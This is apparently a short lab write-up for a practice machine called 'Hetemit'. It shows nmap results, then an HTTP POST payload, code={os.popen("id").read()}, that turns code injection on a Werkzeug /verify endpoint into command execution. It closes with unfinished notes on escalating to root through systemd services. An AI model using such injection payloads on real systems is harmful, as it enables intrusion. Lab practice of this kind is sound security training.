Hetemit

Enumeration

50000/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.6.8)
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
http://192.168.181.117:50000/verify

In the response:
{code}
---
POST /verify HTTP/1.1
Host: 192.168.181.117:50000
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

code={5*5}

In the response:
{25}
---
SSTI to RCE
---
POST /verify HTTP/1.1
code={os.popen("id").read()}

In the response:
{'uid=1000(cmeeks) gid=1000(cmeeks) groups=1000(cmeeks)\n'}

Initial Access

PrivEsc

The most important parameters here are :

• User : The user that the service will run as.

• Execstart : It specifies the command that will run when the service starts.

Now we want to get shell as root. There are many ways to do so with systemd services.

PreviousG00gNextHunit

Last updated